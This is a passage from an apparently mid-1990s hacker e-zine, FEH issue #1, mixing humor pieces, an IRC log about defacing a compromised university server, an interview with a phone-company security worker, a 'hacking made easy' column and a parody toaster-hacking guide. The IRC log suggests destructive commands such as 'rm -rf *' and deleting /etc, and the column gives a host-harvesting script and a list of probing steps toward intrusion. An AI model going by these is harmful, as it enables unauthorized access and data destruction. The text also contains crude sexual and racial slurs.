much time I spend on th) writing an article filled with strange and useless
dribble because you are too lazy to do a real article.. *WARNING* *WARNING*
DO THIS IN ONLY EXTREME EMERGENCIES *WARNING* *WARNING*
[ed note: 6. go onto irc, randomly msg someone you don't know to see just
how lame an article someone who is not FEH can write.]
7. Ftp to rs0.internic.net and retr all of the domain name lists. Spend
the next four or five hours reading the com.zon file and jack off to the
point of orgasm to it .. NO I AM NOT PATHETIC, YOU DO IT TO YOU JUST REFUSE
TO ADMIT TO IT. Do this all the time ... .this doesnt mean your bored, you
are just creative.
[ed note: you are just an idiot]
8. Call up the local noq and say things like
[ed note: I wish I knew what a noq was]
"Do you Deliver?"
"Yeah, I'll have a pair on rye, hold the mayo"
"Umm yes is this the roadkill cafe? I just hit some guy with a Bell
(or whatever your local telco is) Helmet and I think he would be tasty
charred"
"Hey baby what are you wearing?"
"Are you wet?"
"I've got a big phat pole ready for ya.. standing straight up just
for you"
Tape record them... turn them into .wavs or .aus and put them on your
home page... this is something to do when your bored or when you are
PATHETICALLY bored (YES I mean if your on a teleconference).
9. Hack your school's net and make i automatically go to modem doom everytime
someone clicks the left mouse button (hey its fun and it was only ONE of the
reasons I had a remark "DANGER TO COMPUTERS" in my entry in my school's
computer so it is pretty kosher
10. SPELL CHECK this fucking article because I'M NOT GOING TO.
11. If you have www access go to some of the following sites:
http://www.oceania.org | a brilliant scientific endeavor to create
a new, truely democratic society on a synthetically made island.
http://www.smallpenis.org | for those people afraid of being less of
man.. they have support groups AND penis pumps!!!!
http://www.wookie.net/l0ra | A ... home page (no comments .. hehe)
http://www.something.org | A really cool site but I cant remember the
url so i wont put it here.. im sure you will find it
[ed note: 12 was too lame for even FEH to print]
13. Watch tv. Scary huh?
14. Irc and go to #netsex as ILLFUCKU. notice the channel that you want some
one for phone sex. see if you get kicked or invitations. heheh.
15. Read this file (you must be bored d00d).
[ed note: if you search for //, you will find the start of the next article]
16. See how many of these things I type.
[ed note: hint, then answer is 18]
17. Add another to your count.(see previous item)
18. EOF
YEAH IT WAS LAME.. YEAH IT SUCKED.. YEAH IM TYPING IN ALL CAPS.. SO
WHAT?.. I WAS BORED... ARE YOU SATISFIED rEdRAGON???? ( :) )
[ed note: pretty much]
// 10. The Infamous Tack Story by Hotrod
The story you are about to hear, it has been determined, has been spread
by word of mouth to at least 5 states, and parts of Canada. Whereever I
go, people who I have never seen before ask me about the tack story. I
have no idea why this is the case - the story might have been funny once,
but I'm really rather sick of it. My friends (and apparantly these
people I don't know, who ask me about it) think this story is the
funniest thing they've ever heard. I think they are nuts.
The following story is 100% true.
Dramatis Personae:
Myself (Hotrod)
Chris, A friend
Zafir, An acquaintance
[ed note: is he the pan flute dude?]
The Setting:
Junior High School, Massachusetts.
Lunchtime, 8th grade
Ok, here goes. It was a normal lunchtime, really. I had gotten in line
to get the "Hot Lunch", which is the generic, "nutritionally balanced"
meal. On this fateful day, the hot lunch was manicotti with meat sauce.
A kid I knew, and had no reason to distrust, came up to me while I was in
line and offered to sell me his hot lunch, without the milk. (Milk came
with the hot lunch.) Of course, I'm thinking to myself "This kid must be
stupid. He wants to sell me his hot lunch, which costs $1.30, for 50
cents, while keeping his milk, which he could have bought for 35 cents by
itself. [ed note: a savings of -45 cents] I did know that this kid WAS
stupid, however. So I bought the lunch and went to sit where I always sat,
next to my friend Chris. [ed note: not erikb]
For a few minutes, everything was fine. I was eating and enjoying (as
much as one can enjoy a school lunch, anyhow) my manicotti. Keep in
mind, that manicotti is soft, it's something like lasagna. [ed note:
i hope nobody from Italy is reading this] You don't really chew it a whole
lot, you just squish it around in your mouth and swallow. Then it happened.
I put the manicotti into my mouth. [ed note: that's not the climax of the
story, he in fact put many pieces of manicotti in his mouth that day] I
squished. I swallowed. I grunted. I yelled. Something Sharp!
Words that will live in infamy in the minds of my friends.
[ed note: the words 'huuhuhuhhuhu' also live in infamy to his friends]
The dialogue went like this:
Me: [In a very hoarse voice] "Argh@!# Something Sharp! Something sharp
in my throat!"
Chris: "What?" [ed note: still not goggans]
Me: "Argh it kills!"
Chris: "What is it?" [ed note: this time it is erikb saying it]
Me: [Grabbing Chris' chocolate milk and taking a swig] "I can feel it
like grinding down my throat.. You know when you get like the sharp
corner of a Dorito or something? God it kills! It feels like a staple
or a tack or something!"
Chris: [Laughing a bit] "A tack? Zafir probably put a tack in it!"
[ed note: being a minor, Zafir was out of jail on his 18th birthday]
Anyhow, thats about it. It hurt going down. It never hurt again.
To the best of my knowledge, I have not shit out the 'tack'. No proof has
ever been found that there was a tack in my manicotti, [ed note: manicotti
in general should not hurt to swallow] although Chris swears that he talked to
Zafir, and Zafir admitted to it. I think Zafir has since been deported.
I hope so, anyhow. Should I ever shit the tack out, it will be so noted in
a future issue of FEH. [ed note: I have a pencil end in my right shoulder]
// 11. The Birth of FEH by SnoCrash
So ReDragon /msg's me today. He goes "write the history of FEH befor
midnight tonight" (not in those exact words, and in all caps n stuph,
but you get the point).
fEhFeHfEhFeHfEhFeHfEhFeHfEhFeHfEhFeHfEhFeHfEhFeHfEhFeHfEhFeHfEh
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
ThE HiStOrY Of FeH -- PaRt 1 <<ThE BeGiNnInG>>
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
(FuXiN' ElEeT HaXoRs)
A BeDtImE TaLe By Da MaStUr Of DiSaStUr:
SnOcRaSh
Okay, enough with this AlTeRnAtInG CaPs crap. It makes my head hurt.
[ed note: my feelings exactly]
(DISCLAIMER: FOR ALL YOU KNOW, NONE OF THIS COULD BE TRUE. I AM TRYING TO
REMEMBER WHAT HAPPENED AND MY MEMORY SUCKS AND I EXAGGERATE SO DEAL WITH IT)
Well, it all started for me about a year ago. I was bored shitless as usual
on a Sunday morning, and was checking out <name witheld>.edu. I had an
IRC window open as well, as I almost always do. Here's the log from that
fateful day (re-formatted a bit to make it more readable):
[ed note: whenever monumental history takes place on #hack, log it]
<SnoCrash> i found a system that still has the ftp -n bug!!!!!
<ReDragon> sunday afternoon is warez ftping days
[ed note: being as this was a sunday, ReD was probably still a bit drunk]
<SnoCrash> holy shit!!!
<SnoCrash> i feel sorry for the sysop
<SnoCrash> i'm gunna mail him and tell him
<SnoCrash> this is sad
<noxit> last root i haqued
<noxit> i left mail describing how to do it and how to fix it
<noxit> sad
<ReDragon> haha
<Okinawa> noxit; not me, I just rm /etc and let them figure it out
<SnoCrash> rm -rf *
<SnoCrash> ha
<SnoCrash> lame
<SnoCrash> well...
<SnoCrash> what should I do
<Okinawa> no, not /* but just /etc
<SnoCrash> im gunna change the banner explaining what to do
<Okinawa> Were all the configs are ;)
<ReDragon> if you dont rm the site, they will never learn how dangerous
hackers can be and the importance of securing their site
<SnoCrash> Oki: i know
<SnoCrash> and rm every user
<SnoCrash> there's only 10 users
<Okinawa> put in the l0ck motd
<oof> red: gimme warez
[ed note: note oof's critical role in FEH's inception]
<SnoCrash> they all have empty home dirs anyway
<Okinawa> put in a ILF motd
<SnoCrash> cept for the standard shell shit
<ReDragon> oof: whatcha want
<ReDragon> put in a FEH motd <-- the first public mention of FEH
<noxit> ln -s /vmunix /etc/motd
<rS-449> noxit: haha
<loq> oki: if you rm /etc, where are ya gonna put the ILF motd?
<Okinawa> is there a FEH motd?
<grayarea> donut put in an ilf motd :)
<oof> red: i dunno
<grayarea> use feh :)
<SnoCrash> yeah
<ReDragon> i will release an official FEH motd later today
<SnoCrash> feh
<Okinawa> loq: true
<SnoCrash> I'll make up a temp one now
<Okinawa> grayarea: why not?
<SnoCrash> **Hacked by a FEHWB**
<SnoCrash> ha
<grayarea> cuz they r in my new issue and if anything is done in their
name i will be visited
<loq> gray: dont you like being visited?
<loq> :)
<noxit> "visited"
<noxit> aliens of phedz?
<grayarea> and #hack has caused me more than enuf contact with feds for
the year already :)
<noxit> s/of/or
<grayarea> loq: i hear they come at dawn. ewwww
<grayarea> loq: i prefer evening appointments
<loq> heh
<SnoCrash> if I put up a FEH motd, can I be a FEH?
<loq> mine come at 11pm
<ReDragon> Sco: you already are in FEH you moron
<SnoCrash> oh yea
[ed note: i actually said Sco, not sno... but he never realized it]
So there it was. I was in FEH.
I made a temporary FEH /etc/motd, call it FEH motd version .0000001b.
Here is how it looked:
---------HI!!! WELCOME TO <name witheld>, NOW OWNED BY FEH----------
[TODAY'S NEWS]
Your system has been hacked by a member of FEH... Fuxin Eleet Haxors.
I am not particularly proud of this hack because it exploited an extremely
old bug that was patched many years ago. I have left a file in the root
directory called "how.to.fix.the.bugs.you.have" please read it and follow the
directions in it on how to fix the bugs you have. I am very sure that your
system has many bugs, judging from this and the version of sendmail you are
running. Thank you for your time...
--- Anonymous member of FEH who just fuxored up your system real bad
Not exactly beautiful, but it worked for the site it was placed on.
ReD then created the FEH motd versions 1.0 and 1.1, which is located in this
issue within the wopr hack.
[ed note: oof never got his warez, if you have any, please send him some]
// 12. An Interview with Dale Drew by ReDragon
[ed note: good to my word, this is completely unedited for content, only
for formatting.]
ReD: will you do an interview for FEH issue #1?
d_d: I dont do interviews, sorry
ReD: just this once dale. only a few questions
ReD: its not like you've NEVER done an interview
ReD: dont even think of it as an interview, think of it as just
answering a few questions where the answers get published
d_d: haha.. and the difference is?
ReD: well, you dont do interviews. but maybe you do published question
and answer sessions.
ReD: so why dont you do interviews?
d_d: Youve got better things to do than interview me
ReD: when you let me interview you, you keep me out of trouble :)
ReD: so why dont you do interviews?
ReD: well
d_d: too many misquotes
ReD: pleez
ReD: i am not going to misquote you
ReD: so will you answer just a few questions for me
d_d: depends on the questions
ReD: are there any hackers that you particularly like or dislike?
d_d: No.
ReD: Do you think the people you are trying to bust care about learning
about the phone system or are they just trying to make free phone
calls?
d_d: There are to many LEGAL ways to learn about phone systems these days
to put up with fraud.
ReD: So do you think 10 or 20 years ago some phreaking may have been
justified in order to learn?
d_d: I never think that committing fraud is a justifiable way to learn
anything.
ReD: Does it cost your company anything when a person makes a free phone call?
d_d: Making use of a service illegally that would otherwise be billed
for certainly costs the company money
ReD: I understand there is a loss of income from the consumer since they are
not paying, but is there any expense to the phone company for that call
and if so can you estimate the cost?
d_d: I am not in phone fraud, so I wouldnt be able to estimate
ReD: So what is your job description?
d_d: Data Security
ReD: Can you expand on what that encompasses?
d_d: Later.. Ill be back
ReD: do you know when?
<d_d drops connection>
// 13. "Hacking Made Easy Using Scripts" by Seven Eleven
HacK1nG Mad3 EZ Uz1Ng Skr1PtZ Part I by Seven Eleven (711@sec.de)
=======================================
Welcome to our new column, dear reader.
In the software industry, everything is getting easier -
easier to use, easier to handle. The keywords are "Plug and Play",
the new WinDos 95 and "Don't think but drive (on the information
superhighway)".
Now everyone can get on the Internet, your grandfather, your 4 year old sister
and even a coffee machine in Cambridge. There is no need to be smart,
no need to know anything about computers, and no need to have a brain.
With more and more people on the net, more and more want to play
around and learn about other systems by getting into them, formerly
called "Hacking".
To make those tries possible, we are bringing you easy to use and always
working step by step instructions and scripts!
There are 3 major steps to succeed, which are similar to hitting
on a girl:
1) Get a list of all visible targets
2) Check if there is an easy way of scoring
3) Try gettin' into!
Today we will take a look at 1) and 2). 3) will follow in the next issue.
Since all most newsbies know about is IRC, we will try to get a list
of visible targets through IRC!
Here is our great script:
------------------ cut here --------------------------- cut here --------
# IRC Host Leecher 1.0 by Seven Eleven (711@sec.de)
#
# This little one liner gets you all hosts that are currently on IRC
# and sorts the output nicely.
#
# This is especially nice if you plan to use our Host Checker.
#
#
# All you have to do is this:
#
# Start IRC
# /SET LOGFILE rawhosts
# /SET LOG ON
# /WHO **
# /SET LOG OFF
# /QUIT
# $ <Name_of_this_Script> rawhosts > outputfile
#
# Have Fun! :-)
#
#
#!/bin/sh
cat $1 | awk '{print $4}' | awk -F@ '{print $2}' | sort | uniq
------------ cut here --------------------- cut here --------------------
Also try to use an old or modified server that won't kill you when you
list too many names! It used to be easier some months ago, but you should
still be lucky! After all, it's good if not too many Lamers get as far
as you, isn't it? :-)
If everything went fine, you have a wonderfully nice list of hostnames.
If you want to do it the elite way, try writing your own elite script,
executing a command with each of the hostnames. Possibilities include:
- Check with rpcinfo -p which services are available.
Some might be vulnerable!
- One vulnerable daemon is mountd. Figure out yourself how to probe it!
(First Exercise!)
- Use ypx or ypsnarf to test their ypserver's security. If it's open,
either get in or --> social engineer the admin by telling him bugs (lame!)
- Check with the 31337 SATAN!@# (available at a WaR3z near you!)
- Try some sendmail bugs.
If the above ways sound to hard for you, do it the easy way.
Social engineer the administrators!
- Sending mail to root@hostname requesting for an account
(Be prepared for many flames and your old account to be shut down)
If you should surprisingly be successful, drop me a mail and tell
me about your story! If not, stay tuned for the next issue of...
HacK1nG Mad3 EZ Uz1Ng Skr1PtZ!@#
// 14. How to Hack A Toaster Oven by bl0ke
HacKZoRiNG Ah ToaSTeR OOOHHVeNN)#(*%)(*%
========================================
Author:
bl0ke:#$%HS@#H:dat niggah bl0ke:/home/bl0ke:/bin/tcsh
(k)opywr0ngeded 1995
+--------------------------------------------------------------+
| [=ThiS iS THu DEFiNITiVE GuIDE TeW HAxORiNG A ToaSTER)#(%*=] |
+--------------------------------------------------------------+
****************************************************************
*******The Author of this text takes no responsibility for the**
*******actions that are performed on toaster ovens to try and***
*******obtain an access which the superuser does not want a ****
*******regular (l)user to have access to.***********************
*******The author also notes that this text is allowed only*****
*******to be used as a .motd after the site has been hax0red.***
****************************************************************
^^^--------NoTiCE MuH DOpE K-RAD KiLLa AK-AkII SKeeiLLZ()*#$
/*
This text covers the basics of hacking the Proctor & Silex
MoDEL:0225 SERiES:b4588 TyPe:02
This specific toaster handels 120 Volts A.C. *ONLY* 1400 WATTS
*/
CoNNECTiNG:
-----------
When CoNNECTiNG TeW SuCH A ToaSTER On ThU iNeT YeW WiLL b ProMPtED
4 aH LoGiN AnD PaSSwErD. ex:(This is a capture of a login.)
+-------------------+
| PROCTOR & SILEX |
| M:0225 |
| S:b4588 |
| T:02 |
+-------------------+
LaHGiN:bageL-n-KreAM/CheZE
PaSSWeRD:*************************************
LaHGiNN GRaNTiD
***************
------------------------------------------------------------
P&S VeRSiON 666.9.MuRRY_LenDER(*REVISION*)
------------------------------------------------------------
login on tty[tOaST]
last login from BAGeL_BaKERY.COM on tty[ChEZe] at 6:43a.m.
:/etc/motd not found
1: OFF
2: ToAsT StART
3: BRoWN
4: BuRNT
5: LiGHT
6: UNiX TyPE SheLL ENViRONMEnT
If YeW GhET THiS YEW ArE COOL)(#*$ Ok NoW CHEwZe No. SiX. AND RuN NE
Of ThU 8LGMz. They WeRK. DeW NoT WeRRIE BoUT WhUT THU 8lgM SaYZ iT
WiLL STiLL WeRK oN ThIS SYSTEM. AlLLL THu 8LGMz DeW()#*%&( ThE OtHER
CoMMANDs R NoT ImPOrTaNT.
SoME NeaT-O ThINGS. YeW CaN TaP the /dev/ToaST-N-CheEZe. YeW CaN FiND
A FeW PRoGRAMs ThAT ArE GeWD FeR ThIS SuCH SYTeMM.
ftp:ftp.elite.warez.feh.OrG
/pub/hax0ring_WaReZ/ToAsteR_HaxoRiNG_WaREZ
P&S_ToAsTeR_ReWTKiT.TaR.GZ -RooTKiT FeR ThiS TYPE o ToaSTER
PSNiFF.GZ -/dev/ToasT-N-CheEZe SniFFAH
SoME DeFUlTZ:
Login:Password
++++++++++++++
bageL-n-KreAM/CheZE:YuMMY
PoPALeNDER:STiNKY_Joo
POaCHeD_EGZ:HooKGNOZe
root:root
lpd:lpd
guest:hymienotyew
+======================================================================+
ThIS CoNCLuDES ThU DoPEST ARTiCLE On THu FACe O ThU PlaNET)(#*%)(*%
I WooD LiKE TeW GREaT:
Murray_L of the BagelBoyz o HymieTowN.
BuRnT-T of The BuRNT ToasT PoSSE.
AnD ReDRAGoN N ShIT.
PeSE OuT
And on that uplifting note, the first issue of FEH is complete....
Thanks for reading.
- FEH
Reference in New Issue View Git Blame Copy Permalink